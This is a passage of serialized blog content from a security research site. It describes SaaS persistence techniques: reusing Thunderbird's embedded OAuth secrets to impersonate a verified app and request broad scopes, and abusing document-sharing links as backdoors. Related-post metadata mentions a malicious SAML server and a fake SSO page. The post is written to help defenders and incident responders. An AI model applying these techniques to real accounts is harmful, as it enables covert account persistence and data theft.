desktop or mobile apps that obviously can’t keep their OAuth app secrets secret from a user. While it is generally not possible for an attacker to make use of these in a consent phishing attack, due to not controlling the reply URLs, they can be used in a pure persistence scenario with an already compromised account. ",{"data":67059,"content":67060,"nodeType":860},{},[67061],{"data":67062,"marks":67063,"value":67064,"nodeType":864},{},[],"Let’s take Mozilla Thunderbird, a cross-platform email client, as an example. The client IDs and secrets for different OAuth apps are actually stored in the source code in this case: ",{"data":67066,"content":67070,"nodeType":996},{"target":67067},{"sys":67068},{"id":67069,"type":1001,"linkType":1002},"3Ed90clKC3GG4BcPfeV6Nm",[],{"data":67072,"content":67073,"nodeType":860},{},[67074],{"data":67075,"marks":67076,"value":67077,"nodeType":864},{},[],"As an attacker, this gives us multiple advantages. ",{"data":67079,"content":67080,"nodeType":941},{},[67081,67096,67111],{"data":67082,"content":67083,"nodeType":945},{},[67084],{"data":67085,"content":67086,"nodeType":860},{},[67087,67092],{"data":67088,"marks":67089,"value":67091,"nodeType":864},{},[67090],{"type":899},"App Impersonation",{"data":67093,"marks":67094,"value":67095,"nodeType":864},{},[]," - These are client IDs that will be seen in use legitimately by other users and we can impersonate them. In Thunderbird’s case, the Microsoft app isn’t actually a verified app but the Google one shows as verified. Whatever the case, it looks much less suspicious than a completely unknown app with no known business use case. ",{"data":67097,"content":67098,"nodeType":945},{},[67099],{"data":67100,"content":67101,"nodeType":860},{},[67102,67107],{"data":67103,"marks":67104,"value":67106,"nodeType":864},{},[67105],{"type":899},"Flexible Use",{"data":67108,"marks":67109,"value":67110,"nodeType":864},{},[]," - We have access to the client IDs and secrets, so we can do whatever we want with the OAuth integration, writing custom code to query APIs as we please. We are not limited to the functionality provided by Thunderbird itself.\n",{"data":67112,"content":67113,"nodeType":945},{},[67114],{"data":67115,"content":67116,"nodeType":860},{},[67117,67122],{"data":67118,"marks":67119,"value":67121,"nodeType":864},{},[67120],{"type":899},"Arbitrary Permission Granting",{"data":67123,"marks":67124,"value":67125,"nodeType":864},{},[]," - We aren’t actually limited to just the permissions that Thunderbird would normally request (e.g. email/calendar). Since we’re in control of the OAuth secrets, we can just request whatever scopes we want. For example, shown below is us using the Microsoft Thunderbird OAuth secrets to request permissions that also include access to all files, Sharepoint, AD access, etc. \n",{"data":67127,"content":67131,"nodeType":996},{"target":67128},{"sys":67129},{"id":67130,"type":1001,"linkType":1002},"22nQPPKCgUUEr7QPQBFHNS",[],{"data":67133,"content":67137,"nodeType":996},{"target":67134},{"sys":67135},{"id":67136,"type":1001,"linkType":1002},"5eIVlfPzpxuO7D41r7DPfe",[],{"data":67139,"content":67140,"nodeType":941},{},[67141],{"data":67142,"content":67143,"nodeType":945},{},[67144],{"data":67145,"content":67146,"nodeType":860},{},[67147,67152],{"data":67148,"marks":67149,"value":67151,"nodeType":864},{},[67150],{"type":899},"(Semi-)Bypass Google Restricted Scopes",{"data":67153,"marks":67154,"value":67155,"nodeType":864},{},[]," - When it comes to arbitrary permission granting, there is a caveat with Google in that some of the more sensitive scopes Google offer are only available to selected approved and verified apps. Therefore, we can’t necessarily just request access to any permission with Google. For example, if we modify Thunderbird to request access to Google Drive (a restricted scope) then we get the following: ",{"data":67157,"content":67161,"nodeType":996},{"target":67158},{"sys":67159},{"id":67160,"type":1001,"linkType":1002},"3HIcve3zqVFheiZ2tJILJl",[],{"data":67163,"content":67164,"nodeType":860},{},[67165],{"data":67166,"marks":67167,"value":67168,"nodeType":864},{},[],"Access to Gmail is also considered a restricted scope. However, obviously Thunderbird is an email client, so if it uses OAuth it’s going to want access to Gmail, right? Well, yes, the Thunderbird app ID is permitted access to Gmail data, so we can use it to gain that access and appear as a legitimate verified app, in addition to requesting any other non-restricted permissions we’re interested in: ",{"data":67170,"content":67174,"nodeType":996},{"target":67171},{"sys":67172},{"id":67173,"type":1001,"linkType":1002},"5SqY9Q2g7DpHhCGJVQDcgF",[],{"data":67176,"content":67177,"nodeType":1312},{},[67178],{"data":67179,"marks":67180,"value":67181,"nodeType":864},{},[],"Document-sharing links",{"data":67183,"content":67187,"nodeType":996},{"target":67184},{"sys":67185},{"id":67186,"type":1001,"linkType":1002},"2EEC98Ros0MdMX2gt4OGKe",[],{"data":67189,"content":67190,"nodeType":860},{},[67191],{"data":67192,"marks":67193,"value":67194,"nodeType":864},{},[],"Ok, no more OAuth, we promise! The final option we want to highlight is the (ab-)use of document-sharing links. Many organizations make use of OneDrive, Sharepoint and Google Drive for document editing, sharing and collaboration. However, it’s pretty common to want to share documents with people outside your organization sometimes too, right? That’s where document-sharing links come in. You can create a document sharing link to share with specific individuals in other Google/Azure organizations or you can create anonymous links that anyone with knowledge of the (unguessable randomized) link can access.",{"data":67196,"content":67197,"nodeType":860},{},[67198],{"data":67199,"marks":67200,"value":67201,"nodeType":864},{},[],"Very similar functionality is present in both OneDrive and Google Drive, but this same legitimate functionality can also be abused by attackers to maintain backdoor access to either select files or entire root folders. Sharing a root folder will cause future files to inherit those sharing permissions. This is a modern repeat of the age-old problem of access control list (ACL) management on internal file servers, only now internet-based attackers can potentially abuse this without needing VPN or similar access. ",{"data":67203,"content":67207,"nodeType":996},{"target":67204},{"sys":67205},{"id":67206,"type":1001,"linkType":1002},"4IUv2rbEMXrJUAdEYC9xxD",[],{"data":67209,"content":67213,"nodeType":996},{"target":67210},{"sys":67211},{"id":67212,"type":1001,"linkType":1002},"bMAt7XvLmIEIDwzZrAawU",[],{"data":67215,"content":67216,"nodeType":1312},{},[67217],{"data":67218,"marks":67219,"value":24968,"nodeType":864},{},[],{"data":67221,"content":67222,"nodeType":860},{},[67223],{"data":67224,"marks":67225,"value":67226,"nodeType":864},{},[],"We've demonstrated a few new persistence options attackers are using against organizations as they move to the cloud. While some existing persistence and lateral movement options are no longer working in these environments, attackers have been able to quickly adapt to new conditions to get at their targets.",{"data":67228,"content":67229,"nodeType":860},{},[67230],{"data":67231,"marks":67232,"value":67233,"nodeType":864},{},[],"Some of these attacks have already been seen in the wild and others may already be happening under the radar. In any case, being aware of how attackers will try to compromise SaaS-first organizations helps you prepare to defend and respond to these attacks. ",{"data":67235,"content":67236,"nodeType":860},{},[67237],{"data":67238,"marks":67239,"value":67240,"nodeType":864},{},[],"It’s extremely important for incident response teams to adapt to these changes, as a password reset and a device wipe is not sufficient to regain control of a user account, even when no lateral movement to internal systems has been performed.",{"data":67242,"content":67243,"nodeType":860},{},[67244],{"data":67245,"marks":67246,"value":67247,"nodeType":864},{},[],"New steps need to be added to IR playbooks in the event of user or device compromises to cover the revocation of OAuth permissions and refresh tokens, the auditing of mail rules and changes to document sharing configurations.","Attackers have loads of persistence options in an endpoint compromise scenario, but what changes in a SaaS-first world? We talk new attack methods in this post.","2022-11-29T00:00:00.000Z",{"items":67251},[67252],{"sys":67253,"name":6593},{"id":6592},{"items":67255},[67256],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":67257},{"url":4955},"blog/nearly-invisible-attack-chain",{"json":67260},{"data":67261,"content":67262,"nodeType":856},{},[67263],{"data":67264,"content":67265,"nodeType":860},{},[67266],{"data":67267,"marks":67268,"value":67269,"nodeType":864},{},[],"We’re going to demonstrate how combining two of our favorite new SaaS attack techniques - from our SaaS Attacks Matrix research - makes a simple, but very stealthy approach that maintains persistent access.",{"id":60862,"publishedAt":67271},"2026-08-12T11:55:59.906Z",{"items":67273},[67274,67276],{"sys":67275,"name":6593},{"id":6592},{"sys":67277,"name":342},{"id":6596},{"items":67279},[67280,67282,67284,67286,67288,67290,67292,67294,67296,67298],{"sys":67281,"name":279,"slug":280,"tier":31},{"id":276},{"sys":67283,"name":413,"slug":414,"tier":31},{"id":410},{"sys":67285,"name":545,"slug":546,"tier":31},{"id":542},{"sys":67287,"name":342,"slug":343,"tier":31},{"id":339},{"sys":67289,"name":484,"slug":485,"tier":45},{"id":481},{"sys":67291,"name":404,"slug":405,"tier":45},{"id":401},{"sys":67293,"name":571,"slug":572,"tier":45},{"id":568},{"sys":67295,"name":431,"slug":432,"tier":45},{"id":428},{"sys":67297,"name":368,"slug":369,"tier":45},{"id":365},{"sys":67299,"name":333,"slug":334,"tier":45},{"id":330},"dOWGpyVPlOdvk8MP541yXUYAhD19BxKwElFq8HzGBV4",{"id":67302,"title":5236,"authorsCollection":67303,"content":67308,"extension":228,"faqItemsCollection":67776,"faqTitle":59,"featured":6,"hashTags":59,"meta":67778,"metaTitle":67779,"ogImage":59,"postType":5740,"publishedDate":60849,"relatedBlogPostsCollection":67780,"slug":59151,"stem":69610,"subtitle":59,"summary":69611,"synopsis":60848,"sys":69622,"tagsCollection":69624,"topicsCollection":69630,"__hash__":69648},"blog/blog/samljacking-a-poisoned-tenant.json",{"items":67304},[67305],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":67306,"profilePicture":67307},[4953],{"url":4955},{"json":67309,"links":67702},{"data":67310,"content":67311,"nodeType":856},{},[67312,67328,67334,67340,67346,67362,67368,67384,67390,67396,67402,67408,67414,67420,67426,67442,67448,67454,67459,67465,67471,67477,67482,67487,67492,67498,67504,67509,67515,67521,67527,67532,67538,67544,67550,67556,67562,67567,67573,67579,67584,67590,67596,67601,67607,67613,67672,67678,67684,67690,67696],{"data":67313,"content":67314,"nodeType":860},{},[67315,67318,67325],{"data":67316,"marks":67317,"value":60406,"nodeType":864},{},[],{"data":67319,"content":67320,"nodeType":883},{"uri":6418},[67321],{"data":67322,"marks":67323,"value":5765,"nodeType":864},{},[67324],{"type":1455},{"data":67326,"marks":67327,"value":60417,"nodeType":864},{},[],{"data":67329,"content":67330,"nodeType":860},{},[67331],{"data":67332,"marks":67333,"value":60424,"nodeType":864},{},[],{"data":67335,"content":67336,"nodeType":860},{},[67337],{"data":67338,"marks":67339,"value":60431,"nodeType":864},{},[],{"data":67341,"content":67342,"nodeType":1009},{},[67343],{"data":67344,"marks":67345,"value":58596,"nodeType":864},{},[],{"data":67347,"content":67348,"nodeType":860},{},[67349,67352,67359],{"data":67350,"marks":67351,"value":21,"nodeType":864},{},[],{"data":67353,"content":67354,"nodeType":883},{"uri":58605},[67355],{"data":67356,"marks":67357,"value":58610,"nodeType":864},{},[67358],{"type":1455},{"data":67360,"marks":67361,"value":58614,"nodeType":864},{},[],{"data":67363,"content":67364,"nodeType":1009},{},[67365],{"data":67366,"marks":67367,"value":60460,"nodeType":864},{},[],{"data":67369,"content":67370,"nodeType":860},{},[67371,67374,67381],{"data":67372,"marks":67373,"value":21,"nodeType":864},{},[],{"data":67375,"content":67376,"nodeType":883},{"uri":40614},[67377],{"data":67378,"marks":67379,"value":5272,"nodeType":864},{},[67380],{"type":1455},{"data":67382,"marks":67383,"value":60477,"nodeType":864},{},[],{"data":67385,"content":67386,"nodeType":1009},{},[67387],{"data":67388,"marks":67389,"value":60484,"nodeType":864},{},[],{"data":67391,"content":67392,"nodeType":860},{},[67393],{"data":67394,"marks":67395,"value":60491,"nodeType":864},{},[],{"data":67397,"content":67398,"nodeType":860},{},[67399],{"data":67400,"marks":67401,"value":60498,"nodeType":864},{},[],{"data":67403,"content":67404,"nodeType":860},{},[67405],{"data":67406,"marks":67407,"value":60505,"nodeType":864},{},[],{"data":67409,"content":67410,"nodeType":860},{},[67411],{"data":67412,"marks":67413,"value":60512,"nodeType":864},{},[],{"data":67415,"content":67416,"nodeType":860},{},[67417],{"data":67418,"marks":67419,"value":60519,"nodeType":864},{},[],{"data":67421,"content":67422,"nodeType":1009},{},[67423],{"data":67424,"marks":67425,"value":60526,"nodeType":864},{},[],{"data":67427,"content":67428,"nodeType":860},{},[67429,67432,67439],{"data":67430,"marks":67431,"value":60533,"nodeType":864},{},[],{"data":67433,"content":67434,"nodeType":883},{"uri":60536},[67435],{"data":67436,"marks":67437,"value":60542,"nodeType":864},{},[67438],{"type":1455},{"data":67440,"marks":67441,"value":60546,"nodeType":864},{},[],{"data":67443,"content":67444,"nodeType":860},{},[67445],{"data":67446,"marks":67447,"value":60553,"nodeType":864},{},[],{"data":67449,"content":67450,"nodeType":860},{},[67451],{"data":67452,"marks":67453,"value":60560,"nodeType":864},{},[],{"data":67455,"content":67458,"nodeType":996},{"target":67456},{"sys":67457},{"id":60565,"type":1001,"linkType":1002},[],{"data":67460,"content":67461,"nodeType":860},{},[67462],{"data":67463,"marks":67464,"value":60573,"nodeType":864},{},[],{"data":67466,"content":67467,"nodeType":1312},{},[67468],{"data":67469,"marks":67470,"value":60580,"nodeType":864},{},[],{"data":67472,"content":67473,"nodeType":860},{},[67474],{"data":67475,"marks":67476,"value":60587,"nodeType":864},{},[],{"data":67478,"content":67481,"nodeType":996},{"target":67479},{"sys":67480},{"id":60592,"type":1001,"linkType":1002},[],{"data":67483,"content":67486,"nodeType":996},{"target":67484},{"sys":67485},{"id":60598,"type":1001,"linkType":1002},[],{"data":67488,"content":67491,"nodeType":996},{"target":67489},{"sys":67490},{"id":60604,"type":1001,"linkType":1002},[],{"data":67493,"content":67494,"nodeType":1312},{},[67495],{"data":67496,"marks":67497,"value":60612,"nodeType":864},{},[],{"data":67499,"content":67500,"nodeType":860},{},[67501],{"data":67502,"marks":67503,"value":60619,"nodeType":864},{},[],{"data":67505,"content":67508,"nodeType":996},{"target":67506},{"sys":67507},{"id":60624,"type":1001,"linkType":1002},[],{"data":67510,"content":67511,"nodeType":1312},{},[67512],{"data":67513,"marks":67514,"value":60632,"nodeType":864},{},[],{"data":67516,"content":67517,"nodeType":860},{},[67518],{"data":67519,"marks":67520,"value":60639,"nodeType":864},{},[],{"data":67522,"content":67523,"nodeType":860},{},[67524],{"data":67525,"marks":67526,"value":60646,"nodeType":864},{},[],{"data":67528,"content":67531,"nodeType":996},{"target":67529},{"sys":67530},{"id":60651,"type":1001,"linkType":1002},[],{"data":67533,"content":67534,"nodeType":860},{},[67535],{"data":67536,"marks":67537,"value":60659,"nodeType":864},{},[],{"data":67539,"content":67540,"nodeType":1009},{},[67541],{"data":67542,"marks":67543,"value":60666,"nodeType":864},{},[],{"data":67545,"content":67546,"nodeType":1312},{},[67547],{"data":67548,"marks":67549,"value":60673,"nodeType":864},{},[],{"data":67551,"content":67552,"nodeType":860},{},[67553],{"data":67554,"marks":67555,"value":60680,"nodeType":864},{},[],{"data":67557,"content":67558,"nodeType":860},{},[67559],{"data":67560,"marks":67561,"value":60687,"nodeType":864},{},[],{"data":67563,"content":67566,"nodeType":996},{"target":67564},{"sys":67565},{"id":60692,"type":1001,"linkType":1002},[],{"data":67568,"content":67569,"nodeType":1312},{},[67570],{"data":67571,"marks":67572,"value":60700,"nodeType":864},{},[],{"data":67574,"content":67575,"nodeType":860},{},[67576],{"data":67577,"marks":67578,"value":60707,"nodeType":864},{},[],{"data":67580,"content":67583,"nodeType":996},{"target":67581},{"sys":67582},{"id":60712,"type":1001,"linkType":1002},[],{"data":67585,"content":67586,"nodeType":860},{},[67587],{"data":67588,"marks":67589,"value":60720,"nodeType":864},{},[],{"data":67591,"content":67592,"nodeType":860},{},[67593],{"data":67594,"marks":67595,"value":60727,"nodeType":864},{},[],{"data":67597,"content":67600,"nodeType":996},{"target":67598},{"sys":67599},{"id":60732,"type":1001,"linkType":1002},[],{"data":67602,"content":67603,"nodeType":1009},{},[67604],{"data":67605,"marks":67606,"value":58288,"nodeType":864},{},[],{"data":67608,"content":67609,"nodeType":860},{},[67610],{"data":67611,"marks":67612,"value":60746,"nodeType":864},{},[],{"data":67614,"content":67615,"nodeType":941},{},[67616,67625,67634,67653],{"data":67617,"content":67618,"nodeType":945},{},[67619],{"data":67620,"content":67621,"nodeType":860},{},[67622],{"data":67623,"marks":67624,"value":60759,"nodeType":864},{},[],{"data":67626,"content":67627,"nodeType":945},{},[67628],{"data":67629,"content":67630,"nodeType":860},{},[67631],{"data":67632,"marks":67633,"value":60769,"nodeType":864},{},[],{"data":67635,"content":67636,"nodeType":945},{},[67637],{"data":67638,"content":67639,"nodeType":860},{},[67640,67643,67650],{"data":67641,"marks":67642,"value":60779,"nodeType":864},{},[],{"data":67644,"content":67645,"nodeType":883},{"uri":60782},[67646],{"data":67647,"marks":67648,"value":60788,"nodeType":864},{},[67649],{"type":1455},{"data":67651,"marks":67652,"value":21,"nodeType":864},{},[],{"data":67654,"content":67655,"nodeType":945},{},[67656],{"data":67657,"content":67658,"nodeType":860},{},[67659,67662,67669],{"data":67660,"marks":67661,"value":60801,"nodeType":864},{},[],{"data":67663,"content":67664,"nodeType":883},{"uri":60804},[67665],{"data":67666,"marks":67667,"value":60810,"nodeType":864},{},[67668],{"type":1455},{"data":67670,"marks":67671,"value":21,"nodeType":864},{},[],{"data":67673,"content":67674,"nodeType":860},{},[67675],{"data":67676,"marks":67677,"value":60820,"nodeType":864},{},[],{"data":67679,"content":67680,"nodeType":1312},{},[67681],{"data":67682,"marks":67683,"value":24968,"nodeType":864},{},[],{"data":67685,"content":67686,"nodeType":860},{},[67687],{"data":67688,"marks":67689,"value":60833,"nodeType":864},{},[],{"data":67691,"content":67692,"nodeType":860},{},[67693],{"data":67694,"marks":67695,"value":60840,"nodeType":864},{},[],{"data":67697,"content":67698,"nodeType":860},{},[67699],{"data":67700,"marks":67701,"value":60847,"nodeType":864},{},[],{"entries":67703},{"hyperlink":67704,"inline":67705,"block":67706},[],[],[67707,67715,67723,67731,67738,67746,67754,67762,67769],{"sys":67708,"__typename":65481,"title":67709,"youTubeUrl":67710,"imagePlaceholder":67711},{"id":60565}," SAMLjacking a poisoned tenant demo","https://youtu.be/4gAeSxbycXU",{"url":67712,"width":67713,"height":67714},"https://images.ctfassets.net/y1cdw1ablpvd/4FbsSA4V25lkk95JLiezSx/600a821e26d50927a1467ee8075445eb/Screenshot_2023-08-17_at_12.20.11_PM.png",1976,992,{"sys":67716,"__typename":1724,"title":67717,"caption":67718,"layoutMode":59,"file":67719},{"id":60592},"Nuclino team invite","Sharing link method of inviting new users  ",{"url":67720,"width":67721,"height":67722},"https://images.ctfassets.net/y1cdw1ablpvd/10AKFD5hMvE2PYWZ3LaulV/f323a8614df7a1c4f65f4207a5acc6a6/image8.png",1158,656,{"sys":67724,"__typename":1724,"title":67725,"caption":67726,"layoutMode":59,"file":67727},{"id":60598},"Nuclino email invite"," Email invite method of inviting new users",{"url":67728,"width":67729,"height":67730},"https://images.ctfassets.net/y1cdw1ablpvd/hqwOoJ3oacQLReve31WOU/ac949d7c0c440fba6e5bc382afce3e62/image3.png",1152,1104,{"sys":67732,"__typename":1724,"title":67733,"caption":67734,"layoutMode":59,"file":67735},{"id":60604},"Nuclino legit email invite","Example legit email a target user will receive from Nuclino when invited to join a workspace",{"url":67736,"width":1736,"height":67737},"https://images.ctfassets.net/y1cdw1ablpvd/2jPY0vvPllYE7A5mkZqQSc/9eb51364f71b9f4b0e1011214df7c4ac/image2.png",1034,{"sys":67739,"__typename":1724,"title":67740,"caption":67741,"layoutMode":59,"file":67742},{"id":60624},"Nuclino account creation poisoned tenant","Account creation process the target user is prompted with on joining the workspace",{"url":67743,"width":67744,"height":67745},"https://images.ctfassets.net/y1cdw1ablpvd/2mOASAKuRVDJBG9Kxj49gT/63cc74501f0b68a093a179fe9181b40c/image7.png",507,599,{"sys":67747,"__typename":1724,"title":67748,"caption":67749,"layoutMode":59,"file":67750},{"id":60651},"Nuclino custom SAML settings","Custom SAML server settings pointing to a malicious SAML server",{"url":67751,"width":67752,"height":67753},"https://images.ctfassets.net/y1cdw1ablpvd/6ruhgorFea9H78bVp94Ux/558f3d93c65410580607f16048520820/image1.png",1524,828,{"sys":67755,"__typename":1724,"title":67756,"caption":67757,"layoutMode":59,"file":67758},{"id":60692},"Nuclino legit SSO linking email","SSO linking email sent by Nuclino to existing users",{"url":67759,"width":67760,"height":67761},"https://images.ctfassets.net/y1cdw1ablpvd/5joyiKTydkVP0754d1qlgi/5d036ae41c778f4d0f4f38bb539f91e4/image5.png",1516,826,{"sys":67763,"__typename":1724,"title":67764,"caption":67764,"layoutMode":59,"file":67765},{"id":60712},"Workspace login page post SSO configuration",{"url":67766,"width":67767,"height":67768},"https://images.ctfassets.net/y1cdw1ablpvd/1z3d7ItA95c1zDcXC4ufQa/d76037c7502ae405443c9824408f3ed2/image4.png",403,462,{"sys":67770,"__typename":1724,"title":67771,"caption":67771,"layoutMode":59,"file":67772},{"id":60732},"Fake Google SSO login page the target user is redirected to",{"url":67773,"width":67774,"height":67775},"https://images.ctfassets.net/y1cdw1ablpvd/OqmMgyW9UVuvu6NI31mYQ/22b2de1e4ab8d4a48a6b239ce00186dd/image6.png",673,895,{"items":67777},[],{},"SaaS Attack: How to SAMLjack a poisoned tenant",{"items":67781},[67782,68457,69228],{"__typename":2059,"sys":67783,"content":67784,"title":66798,"synopsis":66799,"hashTags":59,"publishedDate":66800,"slug":66801,"tagsCollection":68447,"authorsCollection":68453},{"id":66016},{"json":67785},{"data":67786,"content":67787,"nodeType":856},{},[67788,67794,67800,67806,67812,67818,67824,67829,67845,67851,67887,67893,67899,67935,67951,67957,67963,67969,67985,68001,68007,68037,68043,68059,68065,68071,68097,68113,68119,68124,68130,68136,68142,68148,68154,68160,68166,68172,68178,68184,68190,68196,68209,68215,68271,68277,68283,68306,68319,68325,68331,68337,68363,68380,68386,68392,68398,68404,68420,68436,68441],{"data":67789,"content":67790,"nodeType":860},{},[67791],{"data":67792,"marks":67793,"value":66027,"nodeType":864},{},[],{"data":67795,"content":67796,"nodeType":860},{},[67797],{"data":67798,"marks":67799,"value":66034,"nodeType":864},{},[],{"data":67801,"content":67802,"nodeType":860},{},[67803],{"data":67804,"marks":67805,"value":66041,"nodeType":864},{},[],{"data":67807,"content":67808,"nodeType":860},{},[67809],{"data":67810,"marks":67811,"value":66048,"nodeType":864},{},[],{"data":67813,"content":67814,"nodeType":1009},{},[67815],{"data":67816,"marks":67817,"value":66055,"nodeType":864},{},[],{"data":67819,"content":67820,"nodeType":860},{},[67821],{"data":67822,"marks":67823,"value":66062,"nodeType":864},{},[],{"data":67825,"content":67828,"nodeType":996},{"target":67826},{"sys":67827},{"id":66067,"type":1001,"linkType":1002},[],{"data":67830,"content":67831,"nodeType":860},{},[67832,67835,67842],{"data":67833,"marks":67834,"value":66075,"nodeType":864},{},[],{"data":67836,"content":67837,"nodeType":883},{"uri":6418},[67838],{"data":67839,"marks":67840,"value":6423,"nodeType":864},{},[67841],{"type":1455},{"data":67843,"marks":67844,"value":2924,"nodeType":864},{},[],{"data":67846,"content":67847,"nodeType":860},{},[67848],{"data":67849,"marks":67850,"value":66092,"nodeType":864},{},[],{"data":67852,"content":67853,"nodeType":860},{},[67854,67857,67864,67867,67874,67877,67884],{"data":67855,"marks":67856,"value":66099,"nodeType":864},{},[],{"data":67858,"content":67859,"nodeType":883},{"uri":48092},[67860],{"data":67861,"marks":67862,"value":66107,"nodeType":864},{},[67863],{"type":1455},{"data":67865,"marks":67866,"value":902,"nodeType":864},{},[],{"data":67868,"content":67869,"nodeType":883},{"uri":57775},[67870],{"data":67871,"marks":67872,"value":66118,"nodeType":864},{},[67873],{"type":1455},{"data":67875,"marks":67876,"value":66122,"nodeType":864},{},[],{"data":67878,"content":67879,"nodeType":883},{"uri":66125},[67880],{"data":67881,"marks":67882,"value":66131,"nodeType":864},{},[67883],{"type":1455},{"data":67885,"marks":67886,"value":66135,"nodeType":864},{},[],{"data":67888,"content":67889,"nodeType":860},{},[67890],{"data":67891,"marks":67892,"value":66142,"nodeType":864},{},[],{"data":67894,"content":67895,"nodeType":1312},{},[67896],{"data":67897,"marks":67898,"value":66149,"nodeType":864},{},[],{"data":67900,"content":67901,"nodeType":860},{},[67902,67905,67912,67915,67922,67925,67932],{"data":67903,"marks":67904,"value":66156,"nodeType":864},{},[],{"data":67906,"content":67907,"nodeType":883},{"uri":66159},[67908],{"data":67909,"marks":67910,"value":66165,"nodeType":864},{},[67911],{"type":1455},{"data":67913,"marks":67914,"value":902,"nodeType":864},{},[],{"data":67916,"content":67917,"nodeType":883},{"uri":66171},[67918],{"data":67919,"marks":67920,"value":66177,"nodeType":864},{},[67921],{"type":1455},{"data":67923,"marks":67924,"value":66181,"nodeType":864},{},[],{"data":67926,"content":67927,"nodeType":883},{"uri":57755},[67928],{"data":67929,"marks":67930,"value":66189,"nodeType":864},{},[67931],{"type":1455},{"data":67933,"marks":67934,"value":66193,"nodeType":864},{},[],{"data":67936,"content":67937,"nodeType":860},{},[67938,67941,67948],{"data":67939,"marks":67940,"value":66200,"nodeType":864},{},[],{"data":67942,"content":67943,"nodeType":883},{"uri":58605},[67944],{"data":67945,"marks":67946,"value":66208,"nodeType":864},{},[67947],{"type":1455},{"data":67949,"marks":67950,"value":66212,"nodeType":864},{},[],{"data":67952,"content":67953,"nodeType":860},{},[67954],{"data":67955,"marks":67956,"value":66219,"nodeType":864},{},[],{"data":67958,"content":67959,"nodeType":860},{},[67960],{"data":67961,"marks":67962,"value":66226,"nodeType":864},{},[],{"data":67964,"content":67965,"nodeType":1312},{},[67966],{"data":67967,"marks":67968,"value":66233,"nodeType":864},{},[],{"data":67970,"content":67971,"nodeType":860},{},[67972,67975,67982],{"data":67973,"marks":67974,"value":66240,"nodeType":864},{},[],{"data":67976,"content":67977,"nodeType":883},{"uri":66243},[67978],{"data":67979,"marks":67980,"value":66249,"nodeType":864},{},[67981],{"type":1455},{"data":67983,"marks":67984,"value":66253,"nodeType":864},{},[],{"data":67986,"content":67987,"nodeType":860},{},[67988,67991,67998],{"data":67989,"marks":67990,"value":66260,"nodeType":864},{},[],{"data":67992,"content":67993,"nodeType":883},{"uri":59957},[67994],{"data":67995,"marks":67996,"value":62172,"nodeType":864},{},[67997],{"type":1455},{"data":67999,"marks":68000,"value":66271,"nodeType":864},{},[],{"data":68002,"content":68003,"nodeType":860},{},[68004],{"data":68005,"marks":68006,"value":66278,"nodeType":864},{},[],{"data":68008,"content":68009,"nodeType":941},{},[68010,68019,68028],{"data":68011,"content":68012,"nodeType":945},{},[68013],{"data":68014,"content":68015,"nodeType":860},{},[68016],{"data":68017,"marks":68018,"value":66291,"nodeType":864},{},[],{"data":68020,"content":68021,"nodeType":945},{},[68022],{"data":68023,"content":68024,"nodeType":860},{},[68025],{"data":68026,"marks":68027,"value":66301,"nodeType":864},{},[],{"data":68029,"content":68030,"nodeType":945},{},[68031],{"data":68032,"content":68033,"nodeType":860},{},[68034],{"data":68035,"marks":68036,"value":66311,"nodeType":864},{},[],{"data":68038,"content":68039,"nodeType":860},{},[68040],{"data":68041,"marks":68042,"value":66318,"nodeType":864},{},[],{"data":68044,"content":68045,"nodeType":860},{},[68046,68049,68056],{"data":68047,"marks":68048,"value":66325,"nodeType":864},{},[],{"data":68050,"content":68051,"nodeType":883},{"uri":39722},[68052],{"data":68053,"marks":68054,"value":60979,"nodeType":864},{},[68055],{"type":1455},{"data":68057,"marks":68058,"value":66336,"nodeType":864},{},[],{"data":68060,"content":68061,"nodeType":1312},{},[68062],{"data":68063,"marks":68064,"value":66343,"nodeType":864},{},[],{"data":68066,"content":68067,"nodeType":860},{},[68068],{"data":68069,"marks":68070,"value":66350,"nodeType":864},{},[],{"data":68072,"content":68073,"nodeType":860},{},[68074,68077,68084,68087,68094],{"data":68075,"marks":68076,"value":66357,"nodeType":864},{},[],{"data":68078,"content":68079,"nodeType":883},{"uri":66360},[68080],{"data":68081,"marks":68082,"value":66366,"nodeType":864},{},[68083],{"type":1455},{"data":68085,"marks":68086,"value":902,"nodeType":864},{},[],{"data":68088,"content":68089,"nodeType":883},{"uri":19131},[68090],{"data":68091,"marks":68092,"value":19137,"nodeType":864},{},[68093],{"type":1455},{"data":68095,"marks":68096,"value":66380,"nodeType":864},{},[],{"data":68098,"content":68099,"nodeType":860},{},[68100,68103,68110],{"data":68101,"marks":68102,"value":66387,"nodeType":864},{},[],{"data":68104,"content":68105,"nodeType":883},{"uri":66390},[68106],{"data":68107,"marks":68108,"value":66396,"nodeType":864},{},[68109],{"type":1455},{"data":68111,"marks":68112,"value":66400,"nodeType":864},{},[],{"data":68114,"content":68115,"nodeType":860},{},[68116],{"data":68117,"marks":68118,"value":66407,"nodeType":864},{},[],{"data":68120,"content":68123,"nodeType":996},{"target":68121},{"sys":68122},{"id":57916,"type":1001,"linkType":1002},[],{"data":68125,"content":68126,"nodeType":1009},{},[68127],{"data":68128,"marks":68129,"value":66419,"nodeType":864},{},[],{"data":68131,"content":68132,"nodeType":860},{},[68133],{"data":68134,"marks":68135,"value":66426,"nodeType":864},{},[],{"data":68137,"content":68138,"nodeType":860},{},[68139],{"data":68140,"marks":68141,"value":66433,"nodeType":864},{},[],{"data":68143,"content":68144,"nodeType":1312},{},[68145],{"data":68146,"marks":68147,"value":66440,"nodeType":864},{},[],{"data":68149,"content":68150,"nodeType":860},{},[68151],{"data":68152,"marks":68153,"value":66447,"nodeType":864},{},[],{"data":68155,"content":68156,"nodeType":860},{},[68157],{"data":68158,"marks":68159,"value":66454,"nodeType":864},{},[],{"data":68161,"content":68162,"nodeType":860},{},[68163],{"data":68164,"marks":68165,"value":66461,"nodeType":864},{},[],{"data":68167,"content":68168,"nodeType":1312},{},[68169],{"data":68170,"marks":68171,"value":66468,"nodeType":864},{},[],{"data":68173,"content":68174,"nodeType":860},{},[68175],{"data":68176,"marks":68177,"value":66475,"nodeType":864},{},[],{"data":68179,"content":68180,"nodeType":860},{},[68181],{"data":68182,"marks":68183,"value":66482,"nodeType":864},{},[],{"data":68185,"content":68186,"nodeType":860},{},[68187],{"data":68188,"marks":68189,"value":66489,"nodeType":864},{},[],{"data":68191,"content":68192,"nodeType":1009},{},[68193],{"data":68194,"marks":68195,"value":66496,"nodeType":864},{},[],{"data":68197,"content":68198,"nodeType":860},{},[68199,68202,68206],{"data":68200,"marks":68201,"value":66503,"nodeType":864},{},[],{"data":68203,"marks":68204,"value":66508,"nodeType":864},{},[68205],{"